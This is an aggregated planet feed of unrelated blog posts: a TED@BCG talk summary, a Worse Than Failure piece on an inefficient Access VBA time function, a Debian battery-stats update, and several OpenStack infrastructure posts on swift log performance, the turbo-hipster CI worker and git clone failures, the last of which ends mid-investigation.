Planet Russell

,

TEDSeeing opportunities for change: The talks of TED@BCG

TED@BCG salon at P alais de Tokyo, May 18, 2016, Paris, France. Photo: Richard Hadley/TED

At the latest TED@BCG event at the Palais de Tokyo, in Paris, a diverse range of speakers took on the theme “to boldly transform.” Photo: Richard Hadley/TED

The future is built by those who see opportunities for change and act on them. At TED@BCG — the latest TED Institute event, held on May 18, 2016, at the Palais de Tokyo in Paris — speakers explored what it means to transform boldly. In three sessions of talks, curated and hosted by TED’s Editorial Director, Helen Walters, speakers shared insights about the future of our relationship with nature, the changing makeup of our organizations, the evolving interconnectedness of our economies and more, challenging preconceived notions and embracing change as the only constant.

After opening remarks from Rich Lesser, BCG’s president and CEO, the talks in Session 1 challenged us to look around to see how we might create change here and now, in our workplaces, teams and lives.

Develop a relationship with your curiosity. Not everyone has a friendly rapport with the question mark. Culture critic Laura Fox believes that to become intimately acquainted with knowledge, we must become comfortable with the words, “I don’t know.” By expressing ignorance and confronting our fear of judgement, she says, we can catalyze the painful, gritty task of admitting inexperience into growth — both personally and intellectually.

Want to get ahead? Be paranoid. Lars Fæste helps CEOs transform their businesses, and over the years, he’s noticed something troubling: Managers tend to settle with success instead of aggressively looking for ways to transform. With today’s unprecedented rate of change, transformation is the key to staying ahead of competition and volatile market trends. In other words, If it ain’t broke, fix it. “The paranoid, they thrive. Transformation is a necessity, not an option. Either you do it, or it will be done to you.”

Light made by bacteria. Designer Sandra Rey invites us to look to nature to find unique solutions to some of the world’s most pressing problems. As an example, she describes her own effort to change the way we produce light by using one of nature’s own superpowers: bioluminescence. Using DNA sequences ordered from DNA banks, Rey is developing a technology to create biological lamps by coding genes for bioluminescence in E.coli bacteria. These lamps could not only change the source of our light, says Rey, they could change the entire paradigm of light: how we produce it, buy it, distribute it, how we use it, and how we regulate it.

Sandra Rey wants to use bioluminescence to change the way we light our homes and cities. Photo: Richard Hadley/TED

Sandra Rey wants to use bioluminescence to change the way we light our homes and cities. Photo: Richard Hadley/TED

The fourth manufacturing revolution. Imagine a world where you can buy a custom-made product that’s exactly what you want, with the features you need, the design you prefer, at the same price as a product that’s been mass-produced. According to industrial systems thinker Olivier Scalabre, a revolution in manufacturing will soon make that possible. Scalabre predicts that new convergences of industry and technology will boost worldwide productivity by a third — and will make consumer proximity the most important factor in manufacturing. “If we play it right,” Scalabre says, “we’ll see sustainable growth in all of our economies.”

Why we must safeguard interconnectivity. The 2008 global financial crisis left much of the world reeling — markets went under, millions of jobs were lost and economic security was deeply compromised — in only a few days. IMF economist Min Zhu urges us to open our eyes to the effects of globalization, and the idea that a country’s size does not equate to economic influence; a small blow in one country can cause lasting damage worldwide. Zhu asks that we protect international financial security by working to understand the complex world around us.

Hallucinatory art, created by a neural net. Can computers create art? Blaise Agüera y Arcas is a principal scientist at Google, where he works with deep neural nets for machine perception and distributed learning. Agüera y Arcas breaks down the equation of perception, showing how computers have learned to recognize images through an iterative process. But when you turn the equation around, asking the computer to generate an image using the same neural network built to recognize them, the results are spectacular, hallucinatory collages that defy categorization. “Perception and creativity are connected,” Agüera y Arcas says. “Anything able to do perceptive acts is able to create.”

What happens when computers learn to do art? Google's principal scientist Blaise Agüera y Arcas showed the TED@BCG audience how computers that were created to recognize images can also now create art. Photo: Richard Hadley/TED

What happens when computers learn to do art? Google’s principal scientist Blaise Agüera y Arcas showed the TED@BCG audience how computers that were created to recognize images can also now create art. Photo: Richard Hadley/TED

In Session 2, speakers recognized that it isn’t enough to just acknowledge and anticipate the changes coming our way, but that we have to face them head on.

An Arab woman’s advice for fellow professionals. The poor, oppressed Arab woman — this tired and derogatory yet popular narrative doesn’t discourage Leila Hoteit. Instead, she uses it as fuel to prove that professional Arab women like her are their own role models, pushing boundaries every day while balancing more responsibilities than their male counterparts. Tracing her career as an engineer, advocate and mother in Abu Dhabi, she shares three lessons: Convert other people’s negative judgment into motivation, actively manage your life to leave work at work — and support fellow women instead of blindly competing against them.

Tracing her career as an engineer, advocate and mother, BCG partner and managing director Leila Hoteit shared three inspirational lessons for professional women. "Success is the best revenge," she says. Photo: Richard Hadley/TED

Tracing her career as an engineer, advocate and mother, BCG partner and managing director Leila Hoteit shared three inspirational lessons for professional women. “Success is the best revenge,” she says. Photo: Richard Hadley/TED

A DNA revolution. Using DNA, we can create new medicines or make sure our food is safe to eat, but DNA technology has been confined to the ivory tower, until now. “We are living in the era of personal DNA technology,” says Sebastian Kraves, a molecular neurobiologist committed to bringing DNA analysis to the masses. From a truffle farmer analyzing his mushrooms to make sure they are not knockoffs to a virologist mapping the Ebola outbreak in Sierra Leone, Kraves shares examples of individuals using personal DNA technology to ask questions and solve problems in diverse fields and environments. “Revolutions don’t go backwards,” he says, and this one is “spreading faster than our imagination.”

Who says change needs to be hard? When transforming your organization, put people first. Change expert Jim Hemerling lays out 5 simple rules to convert company reorganization into an empowering, energizing task: inspire through purpose, go all in, enable people to succeed, instill a culture of continual learning and lead through inclusivity. By following these steps, he suggests, adapting your business to reflect today’s constantly-evolving market will feel invigorating rather than exhausting.

Dark and delicate, chaotic rumble. Classical pianist Naufal Mukumi centered Session 2 with a selection of pieces by Russian composer Alexander Scriabin. Opening with a dark and delicate melody, he slowly progressed to a chaotic rumble, expertly creating an elegant surrealist tone. Mukumi’s performance was a perfect, soothing intermission for an exciting session.

Naufal Mukumi performs Alexander Scriabin at TED@BCG. Photo: Richard Hadley / TED

Naufal Mukumi performs a selection of works by Alexander Scriabin at TED@BCG. Photo: Richard Hadley / TED

The corporate immune system. “Where better to turn for advice than nature — that’s been in the business of life and death longer than any company,” asks BCG’s own Martin Reeves. In his second turn on the TED@BCG stage, Reeves identifies six features — redundancy, diversity, modularity, adaptation, prudence, embeddedness — that underpin natural systems, giving them resiliency and endurance. Applying these principles can mean the difference between life or death for a company too. But in order to think more biologically, we need to change our business mindset and focus less on goals, analysis, efficiency and short-term returns. We need to ask ourselves not only “how good is our game?” but “how long will that game last?”

The future of money. There’s no reason why a coin or a dollar bill needs to have value, except that we’ve decided that it should, says Neha Narula, director of research at the Digital Currency Initiative, a part of the MIT Media Lab. Money is really about the relationships we have with each other; it’s a collective story about value by society, a collective fiction. Analog money, like cash, and digital money, like credit cards, both have some built-in impediments that slow them down (like needing to print or mint hard cash). Now, with cryptocurrencies like Bitcoin, Ethereum and Stellar, we’re moving towards a time of programmable money, where anyone can securely pay anyone else without signing up for a bank, asking permission, doing a conversion or worrying about money getting stuck. “Programmable money democratizes money,” Narula says. “By democratizing money, things are going to change and unfold in ways we can’t even predict.”

Finally, in Session 3, speakers laid down the gauntlet to status quo thinking, encouraging us all to do more in whatever ways we can.

A whole-body music composition. Producer, songwriter, beatboxer and vocal arranger MaJiKer uses his whole body to express himself through music. At TED@BCG, he premiered a new piece that combines piano (occasionally played with his foot and head) with beatboxing to craft a catchy, experimental composition.

Harnessing nature’s own designs. Unlike the mere 200-year timespan of modern science, nature has perfected its materials over three billion years, creating materials superior to anything we have managed to produce by ourselves, argues nanobiotechnologist Oded Shoseyov. Shoseyov walks us through amazing examples of materials found across the plant and animal kingdoms in everything from cat fleas to sequoia trees — and the creative ways his team is harnessing these materials for applications as widespread as sports shoes and medical implants.

Transforming the future of two million children. Education innovator Seema Bansal forged a path to public education reform for 15,000 schools in Haryana, India, by setting an ambitious goal: By 2020, 80 percent of children should have grade-level knowledge. The catch? The reforms must be scalable for each school, and function within existing budgets and resources. Bansal and her team found success in low-cost, creative techniques — such as communicating with teachers using SMS group chats — that have measurably improved learning and engagement in the past year.

The commodity of trust. “Every now and then, a truly stellar new technology emerges, and it always takes us to places we never imagined,” says blockchain specialist Mike Schwartz. We witnessed this type of revolution with the combustion engine, the telephone, computers and the Internet, and now blockchain promises to be the next to transform us. Blockchain will commodify trust in the way that the Internet commodified communication, so that “people with no knowledge of each other can interact with confidence and without relying on a trusted third party to do so.” But as with any new technology, there is a steep learning curve and it will take a lot of trial and error to make that future a reality, “In order to shape this future you need to participate. Those organizations that learn how to play in more open and collaborative ecosystems will survive and thrive. Those that don’t probably wont.”

A tiny forest you can grow in your backyard. Forests don’t only have to be far-flung nature reserves, isolated from human life. TED Fellow Shubhendu Sharma brings small, diverse forests back to urban life by flipping the script on engineering: Instead of taking natural resources and turning them into products, he engineers soil, microbes and biomass to kickstart nature’s uninhibited processes of growth. By mixing the right native tree species, Sharma has created 75 dense, thriving man-made forests in 25 cities worldwide.

Reinventing modern agriculture with Space Age technology. How will agriculture expand to feed our growing world in a way that doesn’t deplete resources? Lisa Dyson is working on an idea developed by NASA in the 1960s for deep-space travel — adapting it for use here on Earth. Dyson is using microbes called hydrogenotrophs — super-charged carbon recyclers that can produce nutrients in a matter of hours without sunlight and in small spaces — to create a virtuous, closed-loop carbon cycle that could sustain life on earth. These microbes can produce the building blocks of foods like pasta and bread as well as oils needed for industry. “Let us create systems that keep planet Earth, our spaceship, from not crashing, and let us develop ways of living that will be beneficial to the lives of the 10 billion that will be on this planet by 2050.”

Lisa Dyson wants to use super-charged carbon recycling microbes to change the way we feed the world. Photo: Richard Hadley/TED

Lisa Dyson wants to use super-charged carbon recycling microbes to change the way we feed the world. Photo: Richard Hadley/TED


Planet DebianEnrico Zini: I chipped in

I clicked on a random link and I found myself again in front of a wired.com popup that wanted to explain to me what I have to think about adblockers.

This time I was convinced, and I took my wallet out.

I finally donated $35 to AdBlock.

(And then somebody pointed me to uBlock Origin and I switched to that.)

Worse Than FailureCodeSOD: Data Date Access

Perhaps the greatest evil Microsoft ever perpetrated on the world was putting a full-featured IDE on every end user’s desktop: Microsoft Office. Its macro system is a stripped down version of Visual Basic, complete with a UI-building tool, and when used in conjunction with Access, allows anyone to build a database-driven application. Anyone that’s spent enough time in an “enterprise” has probably inherited at least one Access application that was developed but somebody out at a manufacturing plant that magically became “mission critical”. Still, we can’t blame the end users for that.

There’s a special subset of developer though, that when trying to come up with an application that’s easy deploy, chooses Access as their development environment. “It’s already on all the users’ machines,” they say. “We can just put the MDB on a shared drive,” they say. And that’s how Ben gets handed an Access database and told, “figure out why this is so slow?”

The specific Access database Ben inherited was part of a home-brew customer-relationship-management package, which meant most of the queries needed to filter through a database of emails sent to customers. The SQL was already pretty bad, because it ran three times- once for all the emails with a certain timestamp, once for all the emails a minute earlier, and once for all the emails a minute later. Each query also filtered by the from-field, which really killed the performance since 25% of the emails were sent from the same email address- meaning the three queries did the same filtering three times, and Access isn’t exactly all about the optimization of SQL performance.

What really caught Ben’s eye, though, was that the query didn’t use the built in dateadd function to calculate the one minute earlier/later rule. It used a custom-defined timeAdjust function.

' This function takes a time and returns a rounded time.  If an adjustment
' has been given (+1 or -1 minute) then the time is increased or
' decreased by one minute.  Seconds are zeroed during the process and
' are only included in the returned time is the blSeconds flag is
' true.
Function timeAdjust(varTime, intAdjust As Integer, blSeconds As Boolean) As String
    Dim strHours
    Dim strMins
    Dim strSecs

    ' Get parts of the time
    strHours = Format(varTime, "hh")
    strMins = Format(varTime, "nn")
    strSecs = Format(varTime, "ss")

    ' Adjust time as required
    If intAdjust = 1 Then
        If strMins = "59" Then
            strMins = "00"
            If strHours = "23" Then
                strHours = "00"
            Else
                strHours = strHours + 1
                If Len(strHours) = 1 Then
                    strHours = "0" & strHours
                End If
            End If
        Else
            strMins = strMins + 1
            If Len(strMins) = 1 Then
                strMins = "0" & strMins
            End If
        End If
    End If

    If intAdjust = -1 Then
        If strMins = "00" Then
            strMins = "59"
            If strHours = "00" Then
                strHours = "23"
            Else
                strHours = strHours - 1
                If Len(strHours) = 1 Then
                    strHours = "0" & strHours
                End If
            End If
        Else
            strMins = strMins - 1
            If Len(strMins) = 1 Then
                strMins = "0" & strMins
            End If
        End If
    End If

    ' Rebuild time
    If blSeconds Then
        timeAdjust = strHours & ":" & strMins & ":00"
    Else
        timeAdjust = strHours & ":" & strMins
    End If

    Exit Function
ErrHandler:
    GenericADOErrHandler "clsADOTeamTallies - timeAdjust"
End Function

After a lengthy campaign, Ben received permission to re-implement the application in C# with a real database on the backend. That project was completed and left behind many happy customers.

[Advertisement] Otter allows you to easily create and configure 1,000's of servers, all while maintaining ease-of-use, and granular visibility down to a single server. Find out more and download today!

Planet DebianPetter Reinholdtsen: Discharge rate estimate in new battery statistics collector for Debian

Yesterday I updated the battery-stats package in Debian with a few patches sent to me by skilled and enterprising users. There were some nice user and visible changes. First of all, both desktop menu entries now work. A design flaw in one of the script made the history graph fail to show up (its PNG was dumped in ~/.xsession-errors) if no controlling TTY was available. The script worked when called from the command line, but not when called from the desktop menu. I changed this to look for a DISPLAY variable or a TTY before deciding where to draw the graph, and now the graph window pop up as expected.

The next new feature is a discharge rate estimator in one of the graphs (the one showing the last few hours). New is also the user of colours showing charging in blue and discharge in red. The percentages of this graph is relative to last full charge, not battery design capacity.

The other graph show the entire history of the collected battery statistics, comparing it to the design capacity of the battery to visualise how the battery life time get shorter over time. The red line in this graph is what the previous graph considers 100 percent:

In this graph you can see that I only charge the battery to 80 percent of last full capacity, and how the capacity of the battery is shrinking. :(

The last new feature is in the collector, which now will handle more hardware models. On some hardware, Linux power supply information is stored in /sys/class/power_supply/ACAD/, while the collector previously only looked in /sys/class/power_supply/AC/. Now both are checked to figure if there is power connected to the machine.

If you are interested in how your laptop battery is doing, please check out the battery-stats in Debian unstable, or rebuild it on Jessie to get it working on Debian stable. :) The upstream source is available from github. Patches are very welcome.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Planet Linux AustraliaJoshua Hesketh: OpenStack infrastructure swift logs and performance

Turns out I’m not very good at blogging very often. However I thought I would put what I’ve been working on for the last few days here out of interest.

For a while the OpenStack Infrastructure team have wanted to move away from storing logs on disk to something more cloudy – namely, swift. I’ve been working on this on and off for a while and we’re nearly there.

For the last few weeks the openstack-infra/project-config repository has been uploading its CI test logs to swift as well as storing them on disk. This has given us the opportunity to compare the last few weeks of data and see what kind of effects we can expect as we move assets into an object storage.

  • I should add a disclaimer/warning, before you read, that my methods here will likely make statisticians cringe horribly. For the moment though I’m just getting an indication for how things compare.

The set up

Fetching files from an object storage is nothing particularly new or special (CDN’s have been doing it for ages). However, for our usage we want to serve logs with os-loganalyze giving the opportunity to hyperlink to timestamp anchors or filter by log severity.

First though we need to get the logs into swift somehow. This is done by having the job upload its own logs. Rather than using (or writing) a Jenkins publisher we use a bash script to grab the jobs own console log (pulled from the Jenkins web ui) and then upload it to swift using credentials supplied to the job as environment variables (see my zuul-swift contributions).

This does, however, mean part of the logs are missing. For example the fetching and upload processes write to Jenkins’ console log but because it has already been fetched these entries are missing. Therefore this wants to be the very last thing you do in a job. I did see somebody do something similar where they keep the download process running in a fork so that they can fetch the full log but we’ll look at that another time.

When a request comes into logs.openstack.org, a request is handled like so:

  1. apache vhost matches the server
  2. if the request ends in .txt.gz, console.html or console.html.gz rewrite the url to prepend /htmlify/
  3. if the requested filename is a file or folder on disk, serve it up with apache as per normal
  4. otherwise rewrite the requested file to prepend /htmlify/ anyway

os-loganalyze is set up as an WSGIScriptAlias at /htmlify/. This means all files that aren’t on disk are sent to os-loganalyze (or if the file is on disk but matches a file we want to mark up it is also sent to os-loganalyze). os-loganalyze then does the following:

  1. Checks the requested file path is legitimate (or throws a 400 error)
  2. Checks if the file is on disk
  3. Checks if the file is stored in swift
  4. If the file is found markup (such as anchors) are optionally added and the request is served
    1. When serving from swift the file is fetched via the swiftclient by os-loganlayze in chunks and streamed to the user on the fly. Obviously fetching from swift will have larger network consequences.
  5. If no file is found, 404 is returned

If the file exists both on disk and in swift then step #2 can be skipped by passing ?source=swift as a parameter (thus only attempting to serve from swift). In our case the files exist both on disk and in swift since we want to compare the performance so this feature is necessary.

So now that we have the logs uploaded into swift and stored on disk we can get into some more interesting comparisons.

Testing performance process

My first attempt at this was simply to fetch the files from disk and then from swift and compare the results. A crude little python script did this for me: http://paste.openstack.org/show/122630/

The script fetches a copy of the log from disk and then from swift (both through os-loganalyze and therefore marked-up) and times the results. It does this in two scenarios:

  1. Repeatably fetching the same file over again (to get a good average)
  2. Fetching a list of recent logs from gerrit (using the gerrit api) and timing those

I then ran this in two environments.

  1. On my local network the other side of the world to the logserver
  2. On 5 parallel servers in the same DC as the logserver

Running on my home computer likely introduced a lot of errors due to my limited bandwidth, noisy network and large network latency. To help eliminate these errors I also tested it on 5 performance servers in the Rackspace cloud next to the log server itself. In this case I used ansible to orchestrate the test nodes thus running the benchmarks in parallel. I did this since in real world use there will often be many parallel requests at once affecting performance.

The following metrics are measured for both disk and swift:

  1. request sent – time taken to send the http request from my test computer
  2. response – time taken for a response from the server to arrive at the test computer
  3. transfer – time taken to transfer the file
  4. size – filesize of the requested file

The total time can be found by adding the first 3 metrics together.

 

Results

Home computer, sequential requests of one file

 

The complementary colours are the same metric and the darker line represents swift’s performance (over the lighter disk performance line). The vertical lines over the plots are the error bars while the fetched filesize is the column graph down the bottom. Note that the transfer and file size metrics use the right axis for scale while the rest use the left.

As you would expect the requests for both disk and swift files are more or less comparable. We see a more noticable difference on the responses though with swift being slower. This is because disk is checked first, and if the file isn’t found on disk then a connection is sent to swift to check there. Clearly this is going to be slower.

The transfer times are erratic and varied. We can’t draw much from these, so lets keep analyzing deeper.

The total time from request to transfer can be seen by adding the times together. I didn’t do this as when requesting files of different sizes (in the next scenario) there is nothing worth comparing (as the file sizes are different). Arguably we could compare them anyway as the log sizes for identical jobs are similar but I didn’t think it was interesting.

The file sizes are there for interest sake but as expected they never change in this case.

You might notice that the end of the graph is much noisier. That is because I’ve applied some rudimentary data filtering.

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 54.89516183 43.71917948 56.74750291 194.7547117 849.8545127 838.9172066 7.121600095 7.311125275
Mean 283.9594368 282.5074598 373.7328851 531.8043908 5091.536092 5122.686897 1219.804598 1220.735632

 

I know it’s argued as poor practice to remove outliers using twice the standard deviation, but I did it anyway to see how it would look. I only did one pass at this even though I calculated new standard deviations.

 

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 13.88664039 14.84054789 44.0860569 115.5299781 541.3912899 515.4364601 7.038111654 6.98399691
Mean 274.9291111 276.2813889 364.6289583 503.9393472 5008.439028 5013.627083 1220.013889 1220.888889

 

I then moved the outliers to the end of the results list instead of removing them completely and used the newly calculated standard deviation (ie without the outliers) as the error margin.

Then to get a better indication of what are average times I plotted the histograms of each of these metrics.

Here we can see a similar request time.
 

Here it is quite clear that swift is slower at actually responding.
 

Interestingly both disk and swift sources have a similar total transfer time. This is perhaps an indication of my network limitation in downloading the files.

 

Home computer, sequential requests of recent logs

Next from my home computer I fetched a bunch of files in sequence from recent job runs.

 

 

Again I calculated the standard deviation and average to move the outliers to the end and get smaller error margins.

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 54.89516183 43.71917948 194.7547117 56.74750291 849.8545127 838.9172066 7.121600095 7.311125275
Mean 283.9594368 282.5074598 531.8043908 373.7328851 5091.536092 5122.686897 1219.804598 1220.735632
Second pass without outliers
Standard Deviation 13.88664039 14.84054789 115.5299781 44.0860569 541.3912899 515.4364601 7.038111654 6.98399691
Mean 274.9291111 276.2813889 503.9393472 364.6289583 5008.439028 5013.627083 1220.013889 1220.888889

 

What we are probably seeing here with the large number of slower requests is network congestion in my house. Since the script requests disk, swift, disk, swift, disk.. and so on this evens it out causing a latency in both sources as seen.
 

Swift is very much slower here.

 

Although comparable in transfer times. Again this is likely due to my network limitation.
 

The size histograms don’t really add much here.
 

Rackspace Cloud, parallel requests of same log

Now to reduce latency and other network effects I tested fetching the same log over again in 5 parallel streams. Granted, it may have been interesting to see a machine close to the log server do a bunch of sequential requests for the one file (with little other noise) but I didn’t do it at the time unfortunately. Also we need to keep in mind that others may be access the log server and therefore any request in both my testing and normal use is going to have competing load.
 

I collected a much larger amount of data here making it harder to visualise through all the noise and error margins etc. (Sadly I couldn’t find a way of linking to a larger google spreadsheet graph). The histograms below give a much better picture of what is going on. However out of interest I created a rolling average graph. This graph won’t mean much in reality but hopefully will show which is faster on average (disk or swift).
 

You can see now that we’re closer to the server that swift is noticeably slower. This is confirmed by the averages:

 

  request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 32.42528982 9.749368282 245.3197219 781.8807534 1082.253253 2737.059103 0 0
Mean 4.87337544 4.05191168 39.51898688 245.0792916 1553.098063 4167.07851 1226 1232
Second pass without outliers
Standard Deviation 1.375875503 0.8390193564 28.38377158 191.4744331 878.6703183 2132.654898 0 0
Mean 3.487575109 3.418433003 7.550682037 96.65978872 1389.405618 3660.501404 1226 1232

 

Even once outliers are removed we’re still seeing a large latency from swift’s response.

The standard deviation in the requests now have gotten very small. We’ve clearly made a difference moving closer to the logserver.

 

Very nice and close.
 

Here we can see that for roughly half the requests the response time was the same for swift as for the disk. It’s the other half of the requests bringing things down.
 

The transfer for swift is consistently slower.

 

Rackspace Cloud, parallel requests of recent logs

Finally I ran just over a thousand requests in 5 parallel streams from computers near the logserver for recent logs.

 

Again the graph is too crowded to see what is happening so I took a rolling average.

 

 

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 0.7227904332 0.8900549012 434.8600827 909.095546 1913.9587 2132.992773 6.341238774 7.659678352
Mean 3.515711867 3.56191383 145.5941102 189.947818 2427.776165 2875.289455 1219.940039 1221.384913
Second pass without outliers
Standard Deviation 0.4798803247 0.4966553679 109.6540634 171.1102999 1348.939342 1440.2851 6.137625464 7.565931993
Mean 3.379718381 3.405770445 70.31323922 86.16522485 2016.900047 2426.312363 1220.318912 1221.881335

 

The averages here are much more reasonable than when we continually tried to request the same file. Perhaps we’re hitting limitations with swifts serving abilities.

 

I’m not sure why we have sinc function here. A network expert may be able to tell you more. As far as I know this isn’t important to our analysis other than the fact that both disk and swift match.
 

Here we can now see swift keeping a lot closer to disk results than when we only requested the one file in parallel. Swift is still, unsurprisingly, slower overall.
 

Swift still loses out on transfers but again does a much better job of keeping up.
 

Error sources

I haven’t accounted for any of the following swift intricacies (in terms of caches etc) for:

  • Fetching random objects
  • Fetching the same object over and over
  • Fetching in parallel multiple different objects
  • Fetching the same object in parallel

I also haven’t done anything to account for things like file system caching, network profiling, noisy neighbours etc etc.

os-loganalyze tries to keep authenticated with swift, however

  • This can timeout (causes delays while reconnecting, possibly accounting for some spikes?)
  • This isn’t thread safe (are we hitting those edge cases?)

We could possibly explore getting longer authentication tokens or having os-loganalyze pull from an unauthenticated CDN to add the markup and then serve. I haven’t explored those here though.

os-loganalyze also handles all of the requests not just from my testing but also from anybody looking at OpenStack CI logs. In addition to this it also needs to deflate the gzip stream if required. As such there is potentially a large unknown (to me) load on the log server.

In other words, there are plenty of sources of errors. However I just wanted to get a feel for the general responsiveness compared to fetching from disk. Both sources had noise in their results so it should be expected in the real world when downloading logs that it’ll never be consistent.

Conclusions

As you would expect the request times are pretty much the same for both disk and swift (as mentioned earlier) especially when sitting next to the log server.

The response times vary but looking at the averages and the histograms these are rarely large. Even in the case where requesting the same file over and over in parallel caused responses to go slow these were only in the magnitude of 100ms.

The response time is the important one as it indicates how soon a download will start for the user. The total time to stream the contents of the whole log is seemingly less important if the user is able to start reading the file.

One thing that wasn’t tested was streaming of different file sizes. All of the files were roughly the same size (being logs of the same job). For example, what if the asset was a few gigabytes in size, would swift have any significant differences there? In general swift was slower to stream the file but only by a few hundred milliseconds for a megabyte. It’s hard to say (without further testing) if this would be noticeable on large files where there are many other factors contributing to the variance.

Whether or not these latencies are an issue is relative to how the user is using/consuming the logs. For example, if they are just looking at the logs in their web browser on occasion they probably aren’t going to notice a large difference. However if the logs are being fetched and scraped by a bot then it may see a decrease in performance.

Overall I’ll leave deciding on whether or not these latencies are acceptable as an exercise for the reader.

Planet Linux AustraliaJoshua Hesketh: Third party testing with Turbo-Hipster

Why is this hipster voting on my code?!

Soon you are going to see a new robot barista leaving comments on Nova code reviews. He is obsessed with espresso, that band you haven’t heard of yet, and easing the life of OpenStack operators.

Doing a large OpenStack deployment has always been hard when it came to database migrations. Running a migration requires downtime, and when you have giant datasets that downtime could be hours. To help catch these issues Turbo-Hipster (http://josh.people.rcbops.com/2013/09/building-a-zuul-worker/) will now run your patchset’s migrations against copies of real databases. This will give you valuable feedback on the success of the patch, and how long it might take to migrate.

Depending on the results, Turbo-Hipster will add a review to your patchset that looks something like this:

Example turbo-hipster post

What should I do if Turbo-Hipster fails?

That depends on why it has failed. Here are some scenarios and steps you can take for different errors:

FAILURE – Did not find the end of a migration after a start

  • If you look at the log you should find that a migration began but never finished. Hopefully there’ll be a traceroute for you to follow through to get some hints about why it failed.

WARNING – Migration %s took too long

  • In this case your migration took a long time to run against one of our test datasets. You should reconsider what operations your migration is performing and see if there are any optimisations you can make, or if each step is really necessary. If there is no way to speed up your migration you can email us at rcbau@rcbops.com for an exception.

FAILURE – Final schema version does not match expectation

  • Somewhere along the line the migrations stopped and did not reach the expected version. The datasets start at previous releases and have to upgrade all the way through. If you see this inspect the log for traceroutes or other hints about the failure.

FAILURE – Could not setup seed database. FAILURE – Could not find seed database.

  • These two are internal errors. If you see either of these, contact us at rcbau@rcbops.com to let us know so we can fix and rerun the tests for you.

FAILURE – Could not import required module.

  • This error probably shouldn’t happen as Jenkins should catch it in the unit tests before Turbo-Hipster launches. If you see this, please contact us at rcbau@rcbops.com and let us know.

If you receive an error that you think is a false positive, leave a comment on the review with the sole contents of recheck migrations.

If you see any false positives or have any questions or problems please contact us on rcbau@rcbops.com

Planet Linux AustraliaJoshua Hesketh: LinuxCon Europe

linuxcon-europe-2011After travelling very close to literally the other side of the world[0] I’m in Edinburgh for LinuxCon EU recovering from jetlag and getting ready to attend. I’m very much looking forward to my first LinuxCon, meeting new people and learning lots :-).

If you’re around and would like to catch up drop me a comment here. Otherwise I’ll see you at the conference!

[0] http://goo.gl/maps/JeJO2

Planet Linux AustraliaJoshua Hesketh: New Blog

Welcome to my new blog.

You can find my old one here: http://josh.opentechnologysolutions.com/blog/joshua-hesketh

I intend on back-porting those posts into this one in due course. For now though I’m going to start posting about my adventures in openstack!Wordpress

Planet Linux AustraliaJoshua Hesketh: Introducing turbo-hipster for testing nova db migrations

Zuul is the continuous integration utility used by OpenStack to gate patchsets against tests. It takes care of communicating with gerrit (the code review system) and the test workers – usually Jenkins. You can read more about how the systems tie together on the OpenStack Project Infrastructure page.

The nice thing is that zuul doesn’t require you to use Jenkins. Anybody can provide a worker to zuul using the gearman protocol (which is a simple job server). Enter turbo-hipster*.

“Turbo-hipster is a CI worker with pluggable tasks initially designed to test OpenStack’s database migrations against copies of real databases.”

This will hopefully catch scenarios where changes to the database schema may not work due to outliers in real datasets and also help find where a migration may take an unreasonable amount of time against a large database.

In zuuls layout configuration we are able to specify which jobs should be ran against which projects in which pipelines. For example, for nova we want to run tests when a patchset is created, but we don’t need to run tests against it (necessarily) once it is merged etc. So in zuul we specify a new gate (aka job) to test nova against real databases.

turbo-hipster then listens for jobs created on that gate using the gearman protocol. Once it receives a patchset from zuul it creates a virtual environment and tests the upgrades. It then compiles and sends back the results.

At the moment turbo-hipster is still under heavy development but I hope to have it reporting results back to gerrit patchsets soon as part of zuuls report summary. For the moment I have a separate zuul instance running to test new nova patches and email the results back to me. Here is an example result report:

<code>Build succeeded.

- http://thw01.rcbops.com/logviewer/?q=/results/47/47162/9/check/gate-real-db-upgrade_nova_mysql/c4bc35c/index.html : SUCCESS in 13m 31s
</code>

Turbo Hipster Meme

*The name was randomly generated and does not necessarily contain meaning.

Planet Linux AustraliaJoshua Hesketh: git.openstack.org adventures

Over the past few months I started to notice occasional issues when cloning repositories (particularly nova) from git.openstack.org.

It would fail with something like

git clone -vvv git://git.openstack.org/openstack/nova .
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

The problem would occur sporadically during our 3rd party CI runs causing them to fail. Initially these went somewhat ignored as rechecks on the jobs would succeed and the world would be shiny again. However, as they became more prominent the issue needed to be addressed.

When a patch merges in gerrit it is replicated out to 5 different cgit backends (git0[1-5].openstack.org). These are then balanced by two HAProxy frontends which are on a simple DNS round-robin.

                          +-------------------+
                          | git.openstack.org |
                          |    (DNS Lookup)   |
                          +--+-------------+--+
                             |             |
                    +--------+             +--------+
                    |           A records           |
+-------------------v----+                    +-----v------------------+
| git-fe01.openstack.org |                    | git-fe02.openstack.org |
|   (HAProxy frontend)   |                    |   (HAProxy frontend)   |
+-----------+------------+                    +------------+-----------+
            |                                              |
            +-----+                                    +---+
                  |                                    |
            +-----v------------------------------------v-----+
            |    +---------------------+  (source algorithm) |
            |    | git01.openstack.org |                     |
            |    |   +---------------------+                 |
            |    +---| git02.openstack.org |                 |
            |        |   +---------------------+             |
            |        +---| git03.openstack.org |             |
            |            |   +---------------------+         |
            |            +---| git04.openstack.org |         |
            |                |   +---------------------+     |
            |                +---| git05.openstack.org |     |
            |                    |  (HAProxy backend)  |     |
            |                    +---------------------+     |
            +------------------------------------------------+

Reproducing the problem was difficult. At first I was unable to reproduce locally, or even on an isolated turbo-hipster run. Since the problem appeared to be specific to our 3rd party tests (little evidence of it in 1st party runs) I started by adding extra debugging output to git.

